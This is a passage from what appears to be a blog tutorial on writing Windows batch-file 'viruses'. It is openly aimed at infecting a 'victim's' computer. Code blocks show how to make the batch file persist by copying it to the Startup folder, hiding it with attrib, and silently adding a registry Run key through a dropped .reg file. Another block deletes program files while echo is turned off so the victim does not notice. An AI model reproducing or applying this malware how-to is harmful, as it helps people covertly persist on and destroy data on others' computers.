copy %0 c:\windows\startm~1\Programs\StartUp\whateveryouwa nt.bat
You can change “whateveryouwant.bat” to whatever you want your file to be called and you can change c:\windows\startm~1\program\startup to anywhere else you want to copy your virus. You can also make your virus a bit more hidden by adding this
CODE
Attrib +r +h C:\windows\startm~1\program\startup\whateveryouwan t.bat
after you have copied your virus to the startup folder. This will make your virus hidden and read-only.

There is one more way that I will show you, this (in my opinion) is the best out of the three (it’s also the hardest). This method wills startup your virus when windows loads and it will do it far sneakier/effective than the other two ways I have shown you. We are going to write a key to your victims’ computers registry, which will startup your program when windows loads. To do this we are going to ‘drop’ and open a reg file in the batch file. Here is the code you will need to add to your batch file:

CODE
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\ filename\batchfile.bat" >> c:\regstart.reg
start c:\regstart.reg


This code writes two lines to a reg file which it then open and therefore edits the registry. If you are not familiar with the registry then don’t worry about this method.


Deleting files in batch

Ok, this is the first destructive command we have come across so far (you can see how this will come in handy). Simply type del and then the name/path to what you want to delete E.g.

CODE
@echo off
rem deleting ms paint
del C:\Progra~1\Accessories\MSPAINT.EXE


In this piece of code I have once again used the @echo off command (so your victim cannot see that your deleting things from hid HD). Next I have used the rem command, this is used to add a comments (remarks) these will not display on the screen (if you used the echo off command like above) and have no effect on the code. I recommend using remarks so that when you look back at your code you know what you were trying to do and it will be a lot easier to edit. The last line uses the delete command and then the path to ms paint (note: you cannot have any spaces in any paths you use. If you come across a path with spaces (like c:\program files) then change it to a six letter word with no spaces (c:\Progra) then add ~1 to the end of the 6 letter word (c:\progra~1)).

WordPress Theme: Blue Weed by Jai Nischal Verma | Ported by Ismail | Creative Commons Attribution-ShareAlike 2.5 License (2008).